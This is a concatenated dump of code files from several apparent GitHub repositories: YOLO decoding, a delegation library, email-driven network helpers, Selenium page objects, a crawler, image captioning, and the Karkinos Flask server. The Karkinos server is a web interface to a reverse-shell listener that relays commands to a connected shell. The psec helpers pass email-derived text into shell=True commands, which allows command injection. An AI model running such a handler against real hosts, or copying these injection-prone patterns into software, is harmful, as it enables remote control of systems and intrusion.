    mask1 = contain > 0.1  # greater than the confidence threshold
    mask2 = (contain==contain.max())  # always keep the single best contain_prob, even if it is below the threshold
mask = (mask1+mask2).gt(0)
    # min_score,min_index = torch.min(contain,2)  # keep only the highest-probability box in each cell
for i in range(7):
for j in range(7):
for b in range(2):
# index = min_index[i,j]
# mask[i,j,index] = 0
if mask[i,j,b] == 1:
#print(i,j,b)
box = pred[i,j,b*5:b*5+4]
# box is cx cy w h in (cell ratio; img ratio)
contain_prob = torch.FloatTensor([pred[i,j,b*5+4]])
                    xy = torch.FloatTensor([j,i])*cell_size  # upper-left corner of the cell (in pixels)
box[:2] = box[:2]*cell_size + xy # return cxcy relative to image (in pixel)
box[2:] = box[2:]*img_size
                    box_xy = torch.FloatTensor(box.size())  # convert [cx,cy,w,h] to [x1,y1,x2,y2]
box_xy[:2] = box[:2] - 0.5*box[2:]
box_xy[2:] = box[:2] + 0.5*box[2:]
large = torch.ones(box_xy.shape) * 512
small = torch.zeros(box_xy.shape)
box_xy = torch.where(box_xy>512, large, box_xy)
box_xy = torch.where(box_xy<0, small, box_xy)
max_prob,cls_index = torch.max(pred[i,j,10:],0)
if float((contain_prob*max_prob)[0]) > thresh:
boxes.append(box_xy.view(1,4))
cls_indexs.append(cls_index.unsqueeze(0))
probs.append(contain_prob*max_prob)
if len(boxes) ==0:
boxes = torch.zeros((1,4))
probs = torch.zeros(1)
cls_indexs = torch.zeros(1)
else:
boxes = torch.cat(boxes,0) #(n,4)
probs = torch.cat(probs,0) #(n,)
cls_indexs = torch.cat(cls_indexs,0) #(n,)
keep = nms(boxes,probs)
return boxes[keep],cls_indexs[keep],probs[keep]
def nms(bboxes,scores,threshold=0.5):
'''
bboxes(tensor) [N,4]
scores(tensor) [N,]
'''
x1 = bboxes[:,0]
y1 = bboxes[:,1]
x2 = bboxes[:,2]
y2 = bboxes[:,3]
areas = (x2-x1) * (y2-y1)
_,order = scores.sort(0,descending=True)
keep = []
while order.numel() > 0:
if order.shape == torch.Size([]):
i = order.item()
else:
i = order[0]
keep.append(i)
if order.numel() == 1:
break
xx1 = x1[order[1:]].clamp(min=x1[i])
yy1 = y1[order[1:]].clamp(min=y1[i])
xx2 = x2[order[1:]].clamp(max=x2[i])
yy2 = y2[order[1:]].clamp(max=y2[i])
w = (xx2-xx1).clamp(min=0)
h = (yy2-yy1).clamp(min=0)
inter = w*h
ovr = inter / (areas[i] + areas[order[1:]] - inter)
ids = (ovr<=threshold).nonzero().squeeze()
if ids.numel() == 0:
break
order = order[ids+1]
return torch.LongTensor(keep)
classnames = [
'plane', 'ship', 'storage-tank', 'baseball-diamond',
'tennis-court', 'basketball-court', 'ground-track-field',
'harbor', 'bridge', 'small-vehicle', 'large-vehicle',
'helicopter', 'roundabout', 'soccer-ball-field',
'swimming-pool', 'container-crane']
def reader(label_path):
boxes = []
labels = []
with open(label_path, 'r') as f:
lines = f.readlines()
for line in lines:
obj_ = line.strip().split()
xmin = float(obj_[0])
ymin = float(obj_[1])
xmax = float(obj_[4])
ymax = float(obj_[5])
obj_class = classnames.index(obj_[8]) + 1
boxes.append([xmin, ymin, xmax, ymax])
            labels.append(obj_class)  # class indices are 1-based, matching the +9 offset (channels 10..25) used in encoder()
return boxes, labels
'''
from module.prediction import encoder, reader, _decoder
from module.augment import data_augmentation, processimg
import cv2
import torch
from PIL import Image
img = cv2.imread('hw2_train_val/train15000/images/00000.jpg')
label_path = 'hw2_train_val/train15000/labelTxt_hbb/00000.txt'
boxes, labels = reader(label_path)
boxes = torch.Tensor(boxes)
labels = torch.Tensor(labels)
img, boxes, labels = data_augmentation(img, boxes, labels)
h, w, __ = img.shape
boxes /= torch.Tensor([w, h, w, h]).expand_as(boxes)
img = processimg(img)
target = encoder(boxes, labels)
boxes,cls_indexs,probs = _decoder(target)
'''
``` |
{
"source": "5long/forwardable",
"score": 3
} |
#### File: forwardable/forwardable/__init__.py
```python
__version__ = '0.4.1'
__all__ = ["forwardable", "def_delegator", "def_delegators"]
try:
basestring
except NameError:
basestring = (str, bytes)
import sys
from operator import attrgetter
class NotCalledInModuleScope(Exception): pass
class NotCalledInClassScope(Exception): pass
class WrongDecoratorSyntax(Exception): pass
def def_delegator(wrapped, attr_name, doc_from_class=None, _call_stack_depth=1):
"""
Define a property ``attr_name`` in the current class scope which
forwards accessing of ``self.<attr_name>`` to property
``self.<wrapped>.<attr_name>``.
Must be called in a class scope.
"""
frame = sys._getframe(_call_stack_depth)
if not looks_like_class_frame(frame):
raise NotCalledInClassScope
get_wrapped_obj = attrgetter(wrapped)
def getter(self):
return getattr(get_wrapped_obj(self), attr_name)
def setter(self, value):
return setattr(get_wrapped_obj(self), attr_name, value)
def deleter(self):
return delattr(get_wrapped_obj(self), attr_name)
doc = doc_from_class.__dict__[attr_name].__doc__ if doc_from_class else None
scope = frame.f_locals
scope[attr_name] = property(getter, setter, deleter, doc)
def def_delegators(wrapped, attrs, doc_from_class=None):
"""
Define multiple delegations for a single delegatee. Roughly equivalent
to def_delegator() in a for-loop.
The ``attrs`` argument can be an iterable of attribute names, or
a comma-and-spaces separated string of attribute names. The following
form works identically:
def_delegators(wrapped, ('foo', 'bar')) # Tuple of attribute names
def_delegators(wrapped, 'foo bar') # Separated by space
def_delegators(wrapped, 'foo, bar') # With optional comma
Must be called in a class scope.
"""
attrs = split_attrs(attrs) if isinstance(attrs, basestring) else attrs
for a in attrs:
def_delegator(wrapped, a, doc_from_class=doc_from_class, _call_stack_depth=2)
CLS_SCOPE_KEYS = ("__module__",)
def looks_like_class_frame(frame):
return all(k in frame.f_locals for k in CLS_SCOPE_KEYS)
def is_module_frame(frame):
return frame.f_globals is frame.f_locals
def split_attrs(attrs):
return attrs.replace(',', ' ').split()
def inject(frame):
if not is_module_frame(frame):
raise NotCalledInModuleScope()
frame.f_locals.update(
def_delegator=def_delegator,
def_delegators=def_delegators)
def cleanup(scope):
scope.pop("def_delegator")
scope.pop("def_delegators")
def forwardable():
"""
A class decorator which makes def_delegator() and def_delegators()
available in the class scope.
This decorator must be used in the form of `@forwardable()`, instead of
`@forwardable`. And it must be called in a module scope (which should be
the case for most common class definitions).
"""
frame = sys._getframe(1)
inject(frame)
def decorate(cls):
cleanup(frame.f_locals)
return cls
return decorate
``` |
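A minimal usage sketch of the decorator and helpers above; the Wallet/Person classes are made up for illustration and are not part of the package:
```python
# Delegate Person.balance to Person.wallet.balance (illustrative classes only).
from forwardable import forwardable

class Wallet(object):
    def __init__(self):
        self.balance = 0

@forwardable()  # must be called, and used at module scope
class Person(object):
    def_delegators('wallet', 'balance')  # injected into the class scope by @forwardable()

    def __init__(self):
        self.wallet = Wallet()

p = Person()
p.balance = 5                 # forwarded to p.wallet.balance
assert p.wallet.balance == 5
```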
{
"source": "5lunk/psec",
"score": 2
} |
#### File: 5lunk/psec/service_funcs.py
```python
import re
import sys
import os
import subprocess
import time
import json
import logging
import smtplib
import datetime
import glob
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.application import MIMEApplication
def log_rotation(config):
"""
Log rotation
"""
if os.path.exists(config['log_dir'] + 'logs/') == False:
os.mkdir(config['log_dir'] + 'logs/')
if os.path.exists(config['log_dir'] + 'log_archive/') == False:
os.mkdir(config['log_dir'] + 'log_archive/')
if len(glob.glob1(config['log_dir'] + 'log_archive/', '*.txt')) >= 50:
tar = 'tar czf ' + config['log_dir'] + 'log_archive/log_archive_' + \
datetime.datetime.today().strftime('%Y-%m-%d') + \
'.tar.gz ' + config['log_dir'] + 'log_archive/*.txt'
subprocess.Popen(tar, shell=True, stderr=subprocess.DEVNULL)
for log in glob.glob(config['log_dir'] + 'log_archive/*.txt'):
os.remove(log)
def send_report(email, config):
"""
Sends logs of current requests
Executed if the <REPORT> key is present in the message text
"""
files_list = os.listdir(config['log_dir'] + 'logs/')
# There are open requests
if len(files_list) >= 1:
msg = MIMEMultipart()
msg['Subject'] = 'Logs of current requests in an attachment'
send = smtplib.SMTP(config['mail_server'])
for f in files_list:
file_path = os.path.join(config['log_dir'] + 'logs/', f)
attachment = MIMEApplication(open(file_path, 'rb').read(), _subtype='txt')
attachment.add_header('Content-Disposition', 'attachment', filename=f)
msg.attach(attachment)
msg.attach(MIMEText('Logs of current requests in an attachment'))
send.sendmail(config['mail_from'], [email], msg.as_string())
send.quit()
# No open requests
else:
msg = MIMEMultipart()
msg['Subject'] = 'There are currently no requests being processed'
send = smtplib.SMTP(config['mail_server'])
send.sendmail(config['mail_from'], [email], msg.as_string())
send.quit()
def send_start(log_file_name, mac, config):
"""
Sends a message about the opening of the ticket, indicating the MAC address of the device and the ticket tracker
"""
msg = MIMEMultipart()
msg['Subject'] = mac + ' request accepted'
send = smtplib.SMTP(config['mail_server'])
msg.attach(MIMEText(mac + ' request accepted, TRACKER: ' + log_file_name))
send.sendmail(config['mail_from'], [config['mailbox']], msg.as_string())
send.quit()
def send_end(log_file_name, mac, task_result, config):
"""
Sends a message about the closing of the request with an indication of its status and a log of its execution
"""
msg = MIMEMultipart()
msg['Subject'] = task_result + ' ' + mac
send = smtplib.SMTP(config['mail_server'])
with open(config['log_dir'] + 'logs/' + log_file_name + '.txt', 'r') as f:
log = f.read()
msg.attach(MIMEText(log))
send.sendmail(config['mail_from'], [config['mailbox']], msg.as_string())
send.quit()
def send_violation(message_dict, restriction, config):
"""
Security message
"""
msg = MIMEMultipart()
msg['Subject'] = 'Security notice. Message from: ' + message_dict['email']
send = smtplib.SMTP(config['mail_server'])
msg.attach(MIMEText(restriction +
'\r\n\r\n----------MESSAGE----------\r\n\r\n' +
message_dict['message']))
send.sendmail(config['mail_from'], [config['mailbox']], msg.as_string())
send.quit()
def send_error(message_dict, error, config):
"""
Error message
"""
msg = MIMEMultipart()
msg['Subject'] = 'Error, such request does not exist'
send = smtplib.SMTP(config['mail_server'])
msg.attach(MIMEText(error +
'\r\n\r\n----------MESSAGE----------\r\n\r\n' +
message_dict['message']))
send.sendmail(config['mail_from'], message_dict['email'], msg.as_string())
send.quit()
def kill_in_mess(message_dict, config):
"""
Forces the request to end if the <KILL> key is present in the message
After the specified key in the message, the ticket tracker must be indicated
"""
try:
reg_kill = r'(task_\S+)'
decoded_message = message_dict['message']
task_match = re.search(reg_kill, decoded_message)
log_file_name = task_match.groups()[0]
kill_proc = int(log_file_name.split('_')[1])
try:
os.kill(kill_proc, 9)
mac = log_file_name.split('__')[1].replace('-', '.')
task_result = log_file_name + ' terminated'
send_end(log_file_name, mac, task_result, config)
mv = 'mv ' + config['log_dir'] + 'logs/' + log_file_name + '.txt ' + \
config['log_dir'] + 'log_archive/' + log_file_name + '.txt'
subprocess.Popen(mv, shell=True)
except Exception as error:
send_error(message_dict, str(error), config)
except Exception as error:
send_error(message_dict, str(error), config)
def ip_list_check(log_file_name, task_params, mac, config):
"""
Checks if a host is on the banned list
"""
if task_params['ip_addr'] not in config['bad_ips']:
logging.info('!!!OK!!! This host is not in the list of excluded addresses\r\n\r\n')
else:
logging.info('!!!NOT OK!!! This host is in the list of excluded addresses\r\n\r\nTask failed')
task_result = 'Task failed'
end_task(log_file_name, mac, task_result, config)
def sql_answer_check(log_file_name, sql_answer, mac, config):
"""
Checks the response from the log server DB
"""
if 'Task failed' in sql_answer['answer']:
logging.info(sql_answer['answer'])
task_result = 'Task failed'
end_task(log_file_name, mac, task_result, config)
else:
logging.info('SQL_ANSWER: ' + sql_answer['answer'] + '\r\n')
def clean_message(raw_message_dict):
"""
Message clearing
"""
reg_mess = r'<[\s\S|.]*?>| |"|.*?;}'
clean_mess = re.sub(reg_mess, '', raw_message_dict['message'])
reg_line_break = r'(\r\n){5,}'
clean_mess = re.sub(reg_line_break, '\r\n', clean_mess)
raw_message_dict.update({'message': clean_mess})
return raw_message_dict
def find_macs_in_mess(decoded_message):
"""
Finding the MAC address in a message
"""
reg = re.compile('\s(?P<mac>([0-9A-Fa-fАаВСсЕеOО]{2}[\s:.-]){5}([0-9A-Fa-fАаВСсЕеOО]{2})'
'|([0-9A-Fa-fАаВСсЕеOО]{3}[\s:.-]){3}([0-9A-Fa-fАаВСсЕеOО]{3})'
'|([([0-9A-Fa-fАаВСсЕеOО]{4}[\s:.-]){2}([0-9A-Fa-fАаВСсЕеOО]{4})'
'|([0-9A-Fa-fАаВСсЕеOО]{12}))\s')
m = reg.finditer(decoded_message)
matches = []
for mat in m:
matches.append(mat.group('mac'))
format_matches = []
for match in matches:
match = match.replace(':', "").replace('-', "").replace('.', "") \
.replace(' ', "").replace('\n', "").replace('\t', "")
match = match.lower()
# Replace Cyrillic characters
match = match.replace('а', 'a').replace('в', 'b').replace('с', 'c') \
.replace('е', 'e').replace('о', '0').replace('o', '0')
format_matches.append(match)
if len(format_matches) == 1:
new_mac = format_matches[0]
return new_mac
elif len(format_matches) == 0:
no_mac = 'No MAC addresses found\r\n\r\nTask failed'
return no_mac
elif len(format_matches) >= 2:
too_much_mac = 'Too many matches\r\n\r\nTask failed'
return too_much_mac
def find_macs_in_mess_check(log_file_name, mac, config):
"""
Is there a MAC address in the message?
"""
if 'No MAC addresses found' in mac:
logging.info(mac)
mac = 'No MAC addresses found'
task_result = 'Task failed'
end_task(log_file_name, mac, task_result, config)
elif 'Too many matches' in mac:
logging.info(mac)
mac = 'Too many matches'
task_result = 'Task failed'
end_task(log_file_name, mac, task_result, config)
def create_sql_query(mac, config):
"""
Creates a SQL query for the log server
"""
mac_cisco = mac[:4] + '.' + mac[4:8] + '.' + mac[8:12]
match_sql = ('''mysql -u ''' + config['db_user'] + ''' -p''' + config['db_pass'] +
''' -D Syslog -e "SELECT FromHost, Message FROM SystemEvents WHERE DeviceReportedTime LIKE '%''' +
datetime.datetime.today().strftime('%Y-%m-%d') +
'''%' AND Message REGEXP '.*(''' + mac_cisco +
''').*' ORDER BY ID DESC LIMIT 1;"''')
return match_sql
def end_task(log_file_name, mac, task_result, config):
"""
Ends a request
"""
send_end(log_file_name, mac, task_result, config)
mv = 'mv ' + config['log_dir'] + 'logs/' + log_file_name + '.txt ' + \
config['log_dir'] + 'log_archive/' + log_file_name + '.txt'
subprocess.Popen(mv, shell=True)
sys.exit()
```
#### File: 5lunk/psec/wrapp_class.py
```python
from service_funcs import end_task
class Wrapp:
"""
Class for handling connection methods
"""
@staticmethod
def failed_check(method):
"""
Decorator
        End the task as 'Task failed' when the check returns False; otherwise fall through to the next check
"""
def wrapp_failed_check(self):
if method(self) == False:
task_result = 'Task failed'
end_task(self.log_file_name, self.mac, task_result, self.config)
return wrapp_failed_check
@staticmethod
def next_check(method):
"""
Decorator
        End the task as 'Task completed' when the check returns True; otherwise fall through to the next check
"""
def wrapp_next_check(self):
if method(self) == True:
task_result = 'Task completed'
end_task(self.log_file_name, self.mac, task_result, self.config)
return wrapp_next_check
@staticmethod
def pass_check(method):
"""
Decorator
        Final check: its boolean result decides between 'Task completed' and 'Task failed'
"""
def wrapp_pass_check(self):
if method(self) == True:
task_result = 'Task completed'
else:
task_result = 'Task failed'
end_task(self.log_file_name, self.mac, task_result, self.config)
return wrapp_pass_check
``` |
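An illustrative sketch of how these decorators are meant to be applied; the check class, method names and return values are hypothetical, chosen only to show the expected attributes on `self` (log_file_name, mac, config) and the boolean contract of each check:
```python
# Hypothetical check class using the Wrapp decorators (not from the repo).
class PortChecks:
    def __init__(self, log_file_name, mac, config):
        self.log_file_name = log_file_name
        self.mac = mac
        self.config = config

    @Wrapp.failed_check
    def host_known(self):           # False -> end_task('Task failed')
        return True

    @Wrapp.next_check
    def already_clean(self):        # True -> end_task('Task completed')
        return False

    @Wrapp.pass_check
    def clear_port_security(self):  # result decides the final task status
        return True
```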
{
"source": "5lunk/racks",
"score": 3
} |
#### File: selenium_tests/poms/building_add_page.py
```python
from locators import Locators
class BuildingAddPage():
def __init__(self, driver):
self.driver = driver
self.buildind_name = Locators.building_name
self.building_name_textbox_id = Locators.building_name_textbox_id
self.accept_button_xpath = Locators.accept_button_xpath
def enter_building_name(self, building_name):
self.driver.find_element_by_id(self.building_name_textbox_id). \
send_keys(building_name)
def click_accept(self):
self.driver.find_element_by_xpath(self.accept_button_xpath).click()
```
#### File: selenium_tests/poms/site_add_page.py
```python
from locators import Locators
class SiteAddPage():
def __init__(self, driver):
self.driver = driver
self.site_name = Locators.site_name
self.site_name_textbox_id = Locators.site_name_textbox_id
self.accept_button_xpath = Locators.accept_button_xpath
def enter_site_name(self, site_name):
self.driver.find_element_by_id(self.site_name_textbox_id). \
send_keys(site_name)
def click_accept(self):
self.driver.find_element_by_xpath(self.accept_button_xpath).click()
``` |
{
"source": "5m477/Karkinos",
"score": 3
} |
#### File: bin/Server/app.py
```python
from flask import Flask, render_template, request
import os
import time
import struct
import socket
import threading
app = Flask(__name__)
wsgi_app = app.wsgi_app
def shutdown_server():
func = request.environ.get('werkzeug.server.shutdown')
if func is None:
raise RuntimeError('Server not running')
func()
def startListen():
global client_address, client_socket, s
s.bind((SERVER_HOST, SERVER_PORT))
s.listen(5)
client_socket, client_address = s.accept()
return client_socket
def getData(client_socket):
#client_socket.setblocking(0)
client_socket.settimeout(0.5)
data = bytearray()
try:
while 1:
packet = client_socket.recv(BUFFER_SIZE)
#print(packet)
data.extend(packet)
except socket.timeout as e:
print(data)
return data.decode()
return data.decode()
def shell(c):
global thread, client_socket, s
command = c + "\n"
client_socket.send(command.encode())
return True
@app.route('/config', methods = ['POST'])
def config():
global SERVER_PORT, connected
SERVER_PORT = int(request.form['port'])
print(SERVER_PORT)
if connected == False:
tmpsock = startListen()
out = getData(tmpsock)
connected = True
return render_template('index.html', out=out)
@app.route('/', methods = ['POST', 'GET'])
def index():
global out, client_socket
if request.method == "POST":
c = request.form['command']
shell(c)
out += getData(client_socket)
out += "\n\n"
return render_template('index.html', out=out)
@app.route('/shutdown', methods=['POST'])
def shutdown():
shutdown_server()
return 'Server shutting down...'
if __name__ == '__main__':
SERVER_HOST = "0.0.0.0"
SERVER_PORT = 5011
BUFFER_SIZE = 1024
client_socket = ""
client_address = ""
out = ""
connected = False
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
PORT = int(os.environ.get('SERVER_PORT', '5555'))
except ValueError:
PORT = 5555
app.run(SERVER_HOST, PORT)
``` |
{
"source": "5m477/Python-Automation-Cookbook",
"score": 3
} |
#### File: Python-Automation-Cookbook/Chapter03/crawling_web_step1.py
```python
import argparse
import requests
import logging
import http.client
import re
from urllib.parse import urlparse, urljoin
from bs4 import BeautifulSoup
DEFAULT_PHRASE = 'python'
def process_link(source_link, text):
logging.info(f'Extracting links from {source_link}')
parsed_source = urlparse(source_link)
result = requests.get(source_link)
if result.status_code != http.client.OK:
logging.error(f'Error retrieving {source_link}: {result}')
return []
if 'html' not in result.headers['Content-type']:
logging.info(f'Link {source_link} is not an HTML page')
return []
page = BeautifulSoup(result.text, 'html.parser')
search_text(source_link, page, text)
return get_links(parsed_source, page)
def get_links(parsed_source, page):
'''Retrieve the links on the page'''
links = []
for element in page.find_all('a'):
link = element.get('href')
if not link:
continue
# Avoid internal, same page links
if link.startswith('#'):
continue
# Always accept local links
if not link.startswith('http'):
netloc = parsed_source.netloc
scheme = parsed_source.scheme
path = urljoin(parsed_source.path, link)
link = f'{scheme}://{netloc}{path}'
# Only parse links in the same domain
if parsed_source.netloc not in link:
continue
links.append(link)
return links
def search_text(source_link, page, text):
'''Search for an element with the searched text and print it'''
for element in page.find_all(text=re.compile(text, flags=re.IGNORECASE)):
print(f'Link {source_link}: --> {element}')
def main(base_url, to_search):
checked_links = set()
to_check = [base_url]
max_checks = 10
while to_check and max_checks:
link = to_check.pop(0)
links = process_link(link, text=to_search)
checked_links.add(link)
for link in links:
if link not in checked_links:
checked_links.add(link)
to_check.append(link)
max_checks -= 1
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(dest='url', type=str,
help='Base site url. '
'Use "http://localhost:8000/" '
'for the recipe example')
parser.add_argument('-p', type=str,
help=f'Sentence to search, default: {DEFAULT_PHRASE}',
default=DEFAULT_PHRASE)
args = parser.parse_args()
main(args.url, args.p)
``` |
{
"source": "5m477/samples-for-ai",
"score": 3
} |
#### File: keras/Image_Captioning/Image_Captioning.py
```python
# coding: utf-8
import glob
from PIL import Image
import numpy as np
import pickle
from tqdm import tqdm
import pandas as pd
import keras
from keras.callbacks import Callback
import matplotlib.pyplot as plt
from keras.callbacks import History
from keras.preprocessing import sequence
from keras.models import Sequential
from keras.layers import Add, LSTM, Embedding, TimeDistributed, Dense, RepeatVector, Activation, Flatten, Merge
from keras.layers import concatenate
from keras.optimizers import Adam, RMSprop
from keras.layers.wrappers import Bidirectional
from keras.applications.inception_v3 import InceptionV3
from keras.preprocessing import image
from keras.models import Model
from keras.models import load_model
from keras.utils import plot_model
from IPython.display import clear_output
import os
#The dataset can be obtained in http://lixirong.net/datasets/flickr8kcn
token = './input/Flickr8k_text/Flickr8k.token.txt'
captions = open(token, 'r').read().strip().split('\n')
d = {}
for i, row in enumerate(captions):
row = row.split('\t')
row[0] = row[0][:len(row[0])-2]
if row[0] in d:
d[row[0]].append(row[1])
else:
d[row[0]] = [row[1]]
images = './input/Flicker8k_Dataset/'
img = glob.glob(images+'*.jpg')
train_images_file = './input/Flickr8k_text/Flickr_8k.trainImages.txt'
train_images = set(open(train_images_file, 'r').read().strip().split('\n'))
def split_data(l):
temp = []
for i in l:
temp.append(images+i)
return temp
train_img = split_data(train_images)
val_images_file = './input/Flickr8k_text/Flickr_8k.devImages.txt'
val_images = set(open(val_images_file, 'r').read().strip().split('\n'))
# Getting the validation images from all the images
val_img = split_data(val_images)
len(val_img)
test_images_file = './input/Flickr8k_text/Flickr_8k.testImages.txt'
test_images = set(open(test_images_file, 'r').read().strip().split('\n'))
# Getting the testing images from all the images
test_img = split_data(test_images)
len(test_img)
def preprocess_input(x):
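    # Scale pixels from [0, 255] to [-1, 1], the input range expected by InceptionV3.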
x /= 255.
x -= 0.5
x *= 2.
return x
def preprocess(path):
img = image.load_img(path, target_size=(299, 299))
    x = image.img_to_array(img)
x = np.expand_dims(x, axis=0)
x = preprocess_input(x)
return x
from keras.models import Model
model = InceptionV3(weights='imagenet')
new_input = model.input
hidden_layer = model.layers[-2].output
model_new = Model(new_input, hidden_layer)
import os
def encode(image):
image = preprocess(image)
temp_enc = model_new.predict(image)
temp_enc = np.reshape(temp_enc, temp_enc.shape[1])
return temp_enc
encoding_train = {}
#encoding the images and saving in pickle
if os.path.exists('encoded_images_inceptionV3.p') != True:
for img in tqdm(train_img):
encoding_train[img[len(images):]] = encode(img)
with open("encoded_images_inceptionV3.p", "wb") as encoded_pickle:
pickle.dump(encoding_train, encoded_pickle)
else:
encoding_train = pickle.load(open('encoded_images_inceptionV3.p', 'rb'))
encoding_test = {}
if os.path.exists('encoded_images_test_inceptionV3.p') != True:
for img in tqdm(test_img):
encoding_test[img[len(images):]] = encode(img)
with open("encoded_images_test_inceptionV3.p", "wb") as encoded_pickle:
pickle.dump(encoding_test, encoded_pickle)
else:
encoding_test = pickle.load(open('encoded_images_test_inceptionV3.p', 'rb'))
encoding_val = {}
if os.path.exists('encoded_images_val_inceptionV3.p') != True:
for img in tqdm(val_img):
encoding_val[img[len(images):]] = encode(img)
with open("encoded_images_val_inceptionV3.p", "wb") as encoded_pickle:
pickle.dump(encoding_val, encoded_pickle)
else:
encoding_val = pickle.load(open('encoded_images_val_inceptionV3.p', 'rb'))
train_d = {}
for i in train_img:
if i[len(images):] in d:
train_d[i] = d[i[len(images):]]
val_d = {}
for i in val_img:
if i[len(images):] in d:
val_d[i] = d[i[len(images):]]
test_d = {}
for i in test_img:
if i[len(images):] in d:
test_d[i] = d[i[len(images):]]
captions = []
for key, val in train_d.items():
for i in val:
captions.append('<start> ' + i + ' <end>')
captions_all = []
all_img = []
for i in img:
all_img.append(i)
all_d = {}
for i in all_img:
if i[len(images):] in d:
all_d[i] = d[i[len(images):]]
captions_all = []
for key, val in all_d.items():
for i in val:
captions_all.append('<start> ' + i + ' <end>')
words = [i.split() for i in captions_all]
unique = []
for i in words:
unique.extend(i)
unique = list(set(unique))
word2idx = {val:index for index, val in enumerate(unique)}
idx2word = {index:val for index, val in enumerate(unique)}
vocab_size = len(unique)
f = open('flickr8k_training_dataset.txt', 'w')
f.write("image_id\tcaptions\n")
# creating table in file <image_id>\t<caption>
for key, val in train_d.items():
for i in val:
f.write(key[len(images):] + "\t" + "<start> " + i +" <end>" + "\n")
f.close()
df = pd.read_csv('flickr8k_training_dataset.txt', delimiter='\t')
c = [i for i in df['captions']]
imgs = [i for i in df['image_id']]
samples_per_epoch = 0
for ca in captions:
samples_per_epoch += len(ca.split()) - 1
max_len = 40
captions_val = []
for key, val in val_d.items():
for i in val:
captions_val.append('<start> ' + i + ' <end>')
f = open('flickr8k_validation_dataset.txt', 'w')
f.write("image_id\tcaptions\n")
# creating table in file <image_id>\t<caption>
# creating table in file <image_id>\t<caption>
for key, val in val_d.items():
for i in val:
f.write(key[len(images):] + "\t" + "<start> " + i +" <end>" + "\n")
f.close()
df = pd.read_csv('flickr8k_validation_dataset.txt', delimiter='\t')
c = [i for i in df['captions']]
imgs = [i for i in df['image_id']]
num_val = 0
for ca in captions_val:
num_val += len(ca.split()) - 1
def data_generator(batch_size = 32):
partial_caps = []
next_words = []
images = []
df = pd.read_csv('flickr8k_training_dataset.txt', delimiter='\t')
df = df.sample(frac=1)
iter = df.iterrows()
c = []
imgs = []
for i in range(df.shape[0]):
x = next(iter)
c.append(x[1][1])
imgs.append(x[1][0])
count = 0
while True:
for j, text in enumerate(c):
current_image = encoding_train[imgs[j]]
for i in range(len(text.split())-1):
count+=1
partial = [word2idx[txt] for txt in text.split()[:i+1]]
partial_caps.append(partial)
# Initializing with zeros to create a one-hot encoding matrix
# This is what we have to predict
# Hence initializing it with vocab_size length
n = np.zeros(vocab_size)
# Setting the next word to 1 in the one-hot encoded matrix
n[word2idx[text.split()[i+1]]] = 1
next_words.append(n)
images.append(current_image)
if count>=batch_size:
next_words = np.asarray(next_words)
images = np.asarray(images)
partial_caps = sequence.pad_sequences(partial_caps, maxlen=max_len, padding='post')
# x=[[images, partial_caps], next_words]
# print(x.shape[0], x.shape[1])
yield [[images, partial_caps], next_words]
partial_caps = []
next_words = []
images = []
count = 0
def data_generator_val(batch_size = 512):
partial_caps = []
next_words = []
images = []
df = pd.read_csv('flickr8k_validation_dataset.txt', delimiter='\t')
df = df.sample(frac=1)
iter = df.iterrows()
c = []
imgs = []
for i in range(df.shape[0]):
x = next(iter)
c.append(x[1][1])
imgs.append(x[1][0])
count = 0
while True:
for j, text in enumerate(c):
current_image = encoding_val[imgs[j]]
for i in range(len(text.split())-1):
count+=1
partial = [word2idx[txt] for txt in text.split()[:i+1]]
partial_caps.append(partial)
# Initializing with zeros to create a one-hot encoding matrix
# This is what we have to predict
# Hence initializing it with vocab_size length
n = np.zeros(vocab_size)
# Setting the next word to 1 in the one-hot encoded matrix
n[word2idx[text.split()[i+1]]] = 1
next_words.append(n)
images.append(current_image)
if count>=batch_size:
next_words = np.asarray(next_words)
images = np.asarray(images)
partial_caps = sequence.pad_sequences(partial_caps, maxlen=max_len, padding='post')
# x=[[images, partial_caps], next_words]
# print(x.shape[0], x.shape[1])
yield [[images, partial_caps], next_words]
partial_caps = []
next_words = []
images = []
count = 0
file = open("accuracy.txt", 'w')
file1 = open("loss.txt", 'w')
file2 = open("accuracy_val.txt", 'w')
file3 = open("loss_val.txt", 'w')
# recording acc and loss after each batch
class PlotLosses(Callback):
def __init__(self, model, N):
self.model = model
self.N = N
self.batch = 0
def on_batch_end(self, batch, logs={}):
#if self.batch % self.N == 0:
# name = './weights_after_batches/weights%08d.h5' % batch
# self.model.save_weights(name)
self.batch += 1
def on_epoch_end(self, epoch, logs={}):
file.write("%s\n" %logs.get('acc') )
file1.write("%s\n" %logs.get('loss'))
file2.write("%s\n" %logs.get('val_acc') )
file3.write("%s\n" %logs.get('val_loss'))
embedding_size = 300
image_model = Sequential([
Dense(embedding_size, input_shape=(2048,), activation='relu'),
RepeatVector(max_len)
])
caption_model = Sequential([
Embedding(vocab_size, embedding_size, input_length=max_len),
LSTM(256, return_sequences=True),
TimeDistributed(Dense(300))
])
# merging the models
final_model = Sequential([
Merge([image_model, caption_model], mode='concat', concat_axis=1),
Bidirectional(LSTM(256, return_sequences=False)),
Dense(vocab_size),
Activation('softmax')
])
final_model.compile(loss='categorical_crossentropy', optimizer=RMSprop(), metrics=['accuracy'])
final_model.summary()
final_model.fit_generator(data_generator(batch_size=512), steps_per_epoch=748, validation_data=data_generator_val(batch_size=512), validation_steps=125, workers=4, use_multiprocessing=False, callbacks=[PlotLosses(final_model, 10)], epochs=57)
# save the best weight after training
file.close()
file1.close()
file2.close()
file3.close()
model.save("best_weight.hdf5", overwrite= True)
def predict_captions(image):
start_word = ["<start>"]
while True:
par_caps = [word2idx[i] for i in start_word]
par_caps = sequence.pad_sequences([par_caps], maxlen=max_len, padding='post')
e = encoding_test[image[len(images):]]
preds = final_model.predict([np.array([e]), np.array(par_caps)])
word_pred = idx2word[np.argmax(preds[0])]
start_word.append(word_pred)
if word_pred == "<end>" or len(start_word) > max_len:
break
return ' '.join(start_word[1:-1])
def beam_search_predictions(image, beam_index=3):
start = [word2idx["<start>"]]
start_word = [[start, 0.0]]
while len(start_word[0][0]) < max_len:
temp = []
for s in start_word:
par_caps = sequence.pad_sequences([s[0]], maxlen=max_len, padding='post')
e = encoding_test[image[len(images):]]
preds = final_model.predict([np.array([e]), np.array(par_caps)])
word_preds = np.argsort(preds[0])[-beam_index:]
# Getting the top <beam_index>(n) predictions and creating a
# new list so as to put them via the model again
for w in word_preds:
next_cap, prob = s[0][:], s[1]
next_cap.append(w)
prob += preds[0][w]
